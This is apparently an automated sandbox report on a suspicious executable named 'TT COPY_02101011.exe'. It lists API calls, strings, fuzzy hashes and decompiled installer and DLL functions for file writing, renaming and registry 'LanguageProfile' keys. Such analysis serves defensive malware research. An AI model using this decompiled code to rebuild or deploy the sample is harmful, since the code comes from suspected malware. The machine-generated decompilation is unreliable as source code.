GetShortPathNameA.KERNEL32(00000000,0042BBE0,00000400), ref: 004056EC
wsprintfA.USER32 ref: 0040570A
GetFileSize.KERNEL32(00000000,00000000,0042BBE0,C0000000,00000004,0042BBE0,?,?,?,00000000,000000F1,?), ref: 00405745
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405754
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040576A
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B7E0,00000000,-0000000A,00409328,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B0
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 004057C2
GlobalFree.KERNEL32 ref: 004057C9
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 004057D0

Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE

Strings

[Rename], xrefs: 0040577A, 0040578C
%s=%s, xrefs: 00405700

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$[Rename]
API String ID: 3772915668-1727408572
Opcode ID: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
Instruction ID: f99a8e27a0ac237a4403d65adef5acaf7166b20d7f6f9042e90736f67bd768b8
Opcode Fuzzy Hash: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
Instruction Fuzzy Hash: 8441D031604B15BBE6216B619C49F6B3A6CEF45754F100436F905F72C2EA78A801CEBD

Uniqueness

Uniqueness Score: -1.00%

Function 10001C30, Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 153registryCOMMON

Download Yara Rule

APIs

StringFromGUID2.OLE32(?,?,00000027), ref: 10001D13
RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 10001D6F
StringFromGUID2.OLE32(00000000,?,00000027), ref: 10001D8A
RegSetValueExW.ADVAPI32(?,Default,00000000,00000001,?,0000004E), ref: 10001DA3
StringFromGUID2.OLE32(00000000,?,00000027), ref: 10001DB3
RegSetValueExW.ADVAPI32(?,Profile,00000000,00000001,?,0000004E), ref: 10001DCC
RegCloseKey.ADVAPI32(?), ref: 10001DD6

Strings

%p) %x %s %s, xrefs: 10001C6B
Profile, xrefs: 10001DC3
Assemblies, xrefs: 10001D22
%s\%s\0x%08x\%s, xrefs: 10001D2C
Default, xrefs: 10001D9A

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: FromString$Value$CloseCreate
String ID: %p) %x %s %s$%s\%s\0x%08x\%s$Assemblies$Default$Profile
API String ID: 1318437696-2502594939
Opcode ID: 219de78004404901e4a10b7b8619c7330ff3e8dfab8829f2693213f9e8709c68
Instruction ID: a810eb17c9981278689f5bd632f674f6ba586ade2fedf0eeaa1e4b7a91f9f386
Opcode Fuzzy Hash: 219de78004404901e4a10b7b8619c7330ff3e8dfab8829f2693213f9e8709c68
Instruction Fuzzy Hash: 1C5139B6A40208BBEB14CFA4DC85FEE73B8FB48740F108559F605AB185E775EA44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10002270, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 123registryCOMMON

Download Yara Rule

APIs

StringFromGUID2.OLE32(?,?,00000027), ref: 100022D9
StringFromGUID2.OLE32(?,?,00000027), ref: 100022E9
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,0002001F,?), ref: 10002344
RegQueryValueExW.ADVAPI32(?,Enable,00000000,00000000,00000000,00000004), ref: 1000236F
RegCloseKey.ADVAPI32(?), ref: 1000237C
RegOpenKeyExW.ADVAPI32(80000002,?,00000000,0002001F,?), ref: 1000239F
RegQueryValueExW.ADVAPI32(?,Enable,00000000,00000000,00000000,00000004), ref: 100023CA
RegCloseKey.ADVAPI32(?), ref: 100023D7

Strings

%s\%s\%s\0x%08x\%s, xrefs: 10002309
(%p) %s, %i, %s, %p, xrefs: 100022AF
Enable, xrefs: 10002366, 100023C1
LanguageProfile, xrefs: 100022F8

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFromOpenQueryStringValue
String ID: %s\%s\%s\0x%08x\%s$(%p) %s, %i, %s, %p$Enable$LanguageProfile
API String ID: 193680167-3603924166
Opcode ID: 2239cf649ecf91bfd5d5ccbe60dbfeb49e0bf0c82995ac3b6170ae3169d63a42
Instruction ID: 9019a6df0a4fdffc2af0502b6396b916a850ccad7944babd2507cba8de38034d
Opcode Fuzzy Hash: 2239cf649ecf91bfd5d5ccbe60dbfeb49e0bf0c82995ac3b6170ae3169d63a42
Instruction Fuzzy Hash: 6B4119B6900219FFEB10DF94CD89FEE77B8EB48341F108558F605A6185E774AB84CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10002400, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87registryCOMMON

Download Yara Rule

APIs

StringFromGUID2.OLE32(?,?,00000027), ref: 10002459
StringFromGUID2.OLE32(?,?,00000027), ref: 10002469
RegOpenKeyExW.ADVAPI32(80000002,?,00000000,0002001F,?), ref: 100024C4
RegSetValueExW.ADVAPI32(?,Enable,00000000,00000004,?,00000004), ref: 100024E6
RegCloseKey.ADVAPI32(?), ref: 100024F0

Strings

%s\%s\%s\0x%08x\%s, xrefs: 10002489
(%p) %s %x %s %i, xrefs: 1000243F
Enable, xrefs: 100024DD
LanguageProfile, xrefs: 10002478

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: FromString$CloseOpenValue
String ID: %s\%s\%s\0x%08x\%s$(%p) %s %x %s %i$Enable$LanguageProfile
API String ID: 3688305288-1256949467
Opcode ID: a4dec781b523efaba972fbc07692906d8e0cb1e002f3ad771dceab59233fcf46
Instruction ID: 908e5e9e7281ecf6603aa7e3d9dc0c2648cffd92a0e0ff892a4c1443a0d5240a
Opcode Fuzzy Hash: a4dec781b523efaba972fbc07692906d8e0cb1e002f3ad771dceab59233fcf46
Instruction Fuzzy Hash: 67314FB6900219BBEB14DF94DC85FEE73B8EB48341F008458FB0996145E734EA949BA1

Uniqueness

Uniqueness Score: -1.00%

Function 10002160, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87registryCOMMON

Download Yara Rule

APIs

StringFromGUID2.OLE32(?,?,00000027), ref: 100021B9
StringFromGUID2.OLE32(?,?,00000027), ref: 100021C9
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,0002001F,?), ref: 10002224
RegSetValueExW.ADVAPI32(?,Enable,00000000,00000004,?,00000004), ref: 10002246
RegCloseKey.ADVAPI32(?), ref: 10002250

Strings

%s\%s\%s\0x%08x\%s, xrefs: 100021E9
Enable, xrefs: 1000223D
LanguageProfile, xrefs: 100021D8
(%p) %s %x %s %i, xrefs: 1000219F

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: FromString$CloseOpenValue
String ID: %s\%s\%s\0x%08x\%s$(%p) %s %x %s %i$Enable$LanguageProfile
API String ID: 3688305288-1256949467
Opcode ID: 0041d9ab5ef820f73d5a14189c757d2bf3704b4691c9e3bdc57319b2a0c2b2da
Instruction ID: 87e670aaba4debd1bc59582c74321e0f22317074ae09b411ca6526cff9a90919
Opcode Fuzzy Hash: 0041d9ab5ef820f73d5a14189c757d2bf3704b4691c9e3bdc57319b2a0c2b2da
Instruction Fuzzy Hash: 85316FB6900208BBEB10DFD4DC45FEE73B8EB48340F008058FB09A6145E774EA949BA1

Uniqueness

Uniqueness Score: -1.00%

Function 10001490, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 73registryCOMMON

Download Yara Rule

APIs

StringFromGUID2.OLE32(?,?,00000027), ref: 100014BA
StringFromGUID2.OLE32(?,?,00000027), ref: 100014CA
RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 1000152F
RegSetValueExW.ADVAPI32(?,Enable,00000000,00000004,00000000,00000004), ref: 1000155E
RegCloseKey.ADVAPI32(?), ref: 1000156E

Strings

%s\%s\%s\0x%08x\%s, xrefs: 100014EA
Enable, xrefs: 10001555
LanguageProfile, xrefs: 100014D9

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: FromString$CloseCreateValue
String ID: %s\%s\%s\0x%08x\%s$Enable$LanguageProfile
API String ID: 32363474-1306068423
Opcode ID: 443df1889662e57bd12b83c7017a512e3e56eaa453bfa8b613d20d63e31c19ab
Instruction ID: dfd999879bfc19bf0f540acf43a102d6e140894a7d5dd1f2d21ba76d441db4b2
Opcode Fuzzy Hash: 443df1889662e57bd12b83c7017a512e3e56eaa453bfa8b613d20d63e31c19ab
Instruction Fuzzy Hash: 25210CB5900318FBEB10DB90CC89FEEB7B8EB48711F108558F6156A185E774AA848BA1

Uniqueness

Uniqueness Score: -1.00%

Function 100010A0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000070), ref: 100010AA
HeapAlloc.KERNEL32(00000000), ref: 100010B1
GetProcessHeap.KERNEL32(00000000,?), ref: 10001108
HeapFree.KERNEL32(00000000), ref: 1000110F

Strings

returning %p, xrefs: 1000116C

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocFree
String ID: returning %p
API String ID: 756756679-1981732286
Opcode ID: eeca40bdf19d387dd9ebf24a08be757335c9a397eb24d1316ee1a1f8876deb75
Instruction ID: 2b119429821eb8094975dbfedf490236e0edb5d0f238ba3051d0ceca3c90b30e
Opcode Fuzzy Hash: eeca40bdf19d387dd9ebf24a08be757335c9a397eb24d1316ee1a1f8876deb75
Instruction Fuzzy Hash: 97213C74A44208FFE700DFA0CC89B9D77B4EB49745F208044FA09AB385D770AE80DB65

Uniqueness

Uniqueness Score: -1.00%

Function 10002FF0, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,0002001F,-00000039), ref: 1000305D
RegEnumKeyExW.ADVAPI32 ref: 100030A6
RegCloseKey.ADVAPI32(?), ref: 100030C5
CLSIDFromString.OLE32(?,?), ref: 100030FE

Strings

LanguageProfile, xrefs: 10003011
%s\%s\0x%08x, xrefs: 1000301D
', xrefs: 10002FF9

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEnumFromOpenString
String ID: %s\%s\0x%08x$'$LanguageProfile
API String ID: 2638302380-2813637096
Opcode ID: ea1a4f91903695fdcb4b26df9c24b16d92fdfbfc9e3b8c258f6deb48741101aa
Instruction ID: 520633f65f34149f6797ac5967d72ee33fae3fd7b9c3a84646dcbd6a95092bdc
Opcode Fuzzy Hash: ea1a4f91903695fdcb4b26df9c24b16d92fdfbfc9e3b8c258f6deb48741101aa
Instruction Fuzzy Hash: 6261E6B5600209EFDB04DF54C890B9ABBB9FF48354F10C259F9099B396D774EA85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00405B89, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405B89(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E0040548B(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405449("*?|<>/\":", _t5))) == 0) {
							E004055C3(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00405b8b
0x00405b93
0x00405ba7
0x00405ba7
0x00405bad
0x00405bba
0x00405bba
0x00405bbb
0x00405bbd
0x00405bc1
0x00405bc3
0x00405bcc
0x00405bce
0x00405be8
0x00405bf0
0x00405bf0
0x00405bf5
0x00405bf7
0x00405bf9
0x00405bfd
0x00405bfe
0x00405c01
0x00405c09
0x00405c0b
0x00405c0f
0x00000000
0x00000000
0x00405c15
0x00405c1a
0x00000000
0x00000000
0x00000000
0x00405c1a
0x00405c1f

APIs

CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
CharPrevA.USER32(?,?,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B8A, 00405BC5
*?|<>/":, xrefs: 00405BD1
"C:\Users\user\Desktop\TT COPY_02101011.exe" , xrefs: 00405B8F

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\TT COPY_02101011.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-89165186
Opcode ID: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
Instruction ID: c1e19bc38f5928a16c8df4e3184f884ce5b3d56ade5c4132b49213cb44a1c68a
Opcode Fuzzy Hash: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
Instruction Fuzzy Hash: 41119351809B912DFB3216244C44B77BFA9CB96760F18447BE9D4622C2C6BCBC829B7D

Uniqueness

Uniqueness Score: -1.00%

Function 00403D44, Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403D44(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x00403d56
0x00403dea
0x00000000
0x00403dea
0x00403d67
0x00403d6b
0x00000000
0x00000000
0x00403d71
0x00403d7a
0x00403d7d
0x00403d7d
0x00403d83
0x00403d89
0x00403d89
0x00403d95
0x00403d9b
0x00403da2
0x00403da5
0x00403da8
0x00403daa
0x00403daa
0x00403db2
0x00403db8
0x00403db8
0x00403dc2
0x00403dc7
0x00403dca
0x00403dcf
0x00403dd2
0x00403dd2
0x00403de2
0x00403de2
0x00000000

APIs

GetWindowLongA.USER32 ref: 00403D61
GetSysColor.USER32(00000000), ref: 00403D7D
SetTextColor.GDI32(?,00000000), ref: 00403D89
SetBkMode.GDI32(?,?), ref: 00403D95
GetSysColor.USER32(?), ref: 00403DA8
SetBkColor.GDI32(?,?), ref: 00403DB8
DeleteObject.GDI32(?), ref: 00403DD2
CreateBrushIndirect.GDI32(?), ref: 00403DDC

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction ID: ac003594d1dcb8ae4d3b01263828f587cf1b0240a4208d46790e3dc2010cfdd8
Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction Fuzzy Hash: 58218471904744ABC7219F78DD08B9B7FFCAF01715F048A29E895E22E0D739E904CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0040266E, Relevance: 10.6, APIs: 7, Instructions: 89
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040266E(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029E8(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E0040548B(_t52) == 0) {
					E004029E8(0xffffffed);
				}
				E004055E3(_t52);
				_t27 = E00405602(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x42eb74; // 0x8200
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E00403098(_t47);
						E00403066(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402E44( *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E004055C3( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402E44(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}

0x0040266e
0x00402670
0x0040267c
0x0040267f
0x00402689
0x0040268d
0x0040268d
0x00402693
0x004026a0
0x004026a8
0x004026ab
0x004026b1
0x004026bf
0x004026c4
0x004026c8
0x004026cb
0x004026d4
0x004026e0
0x004026e4
0x004026e7
0x004026f1
0x00402710
0x004026f8
0x004026fd
0x00402705
0x00402708
0x0040270d
0x0040270d
0x00402717
0x00402717
0x00402729
0x00402730
0x00402742
0x00402742
0x00402748
0x00402748
0x00402753
0x00402754
0x00402758
0x0040275c
0x00402762
0x00402762
0x00402769
0x00402156
0x00402880
0x0040288c

APIs

GlobalAlloc.KERNEL32(00000040,00008200,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
GlobalFree.KERNEL32 ref: 00402717
WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
GlobalFree.KERNEL32 ref: 00402730
CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 1fe56166fb6cd4dbd5b8f8a47f0c0769986a224b60575e965902ed59b0249d4b
Instruction ID: 8136da2242d6e6cba5f284f27b64b1989b358de0d737458f3662c87ad7b72ced
Opcode Fuzzy Hash: 1fe56166fb6cd4dbd5b8f8a47f0c0769986a224b60575e965902ed59b0249d4b
Instruction Fuzzy Hash: 4A318B71C00128BBDF216FA9CD49DAE7E79EF05324F10822AF520762E0C7795D419BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404CC9, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404CC9(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42e344; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42ec14; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E0040594D(0, _t39, 0x4297b0, 0x4297b0, _a4);
					}
					_t26 = lstrlenA(0x4297b0);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42e328, 0x4297b0);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x4297b0;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x4297b0)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x4297b0, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00404ccf
0x00404cdb
0x00404cde
0x00404ce4
0x00404cf0
0x00404cf3
0x00404cf6
0x00404cfc
0x00404cfc
0x00404d02
0x00404d0a
0x00404d0d
0x00404d2a
0x00404d2e
0x00404d37
0x00404d37
0x00404d41
0x00404d4a
0x00404d56
0x00404d5d
0x00404d61
0x00404d64
0x00404d77
0x00404d85
0x00404d85
0x00404d89
0x00404d8b
0x00404d8e
0x00000000
0x00404d8e
0x00404d0f
0x00404d17
0x00404d1f
0x00404d25
0x00000000
0x00404d25
0x00404d1f
0x00404d0d
0x00404d98

APIs

lstrlenA.KERNEL32(004297B0,00000000,0041F4C3,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041F4C3,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041F4C3,73BCEA30), ref: 00404D25
SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
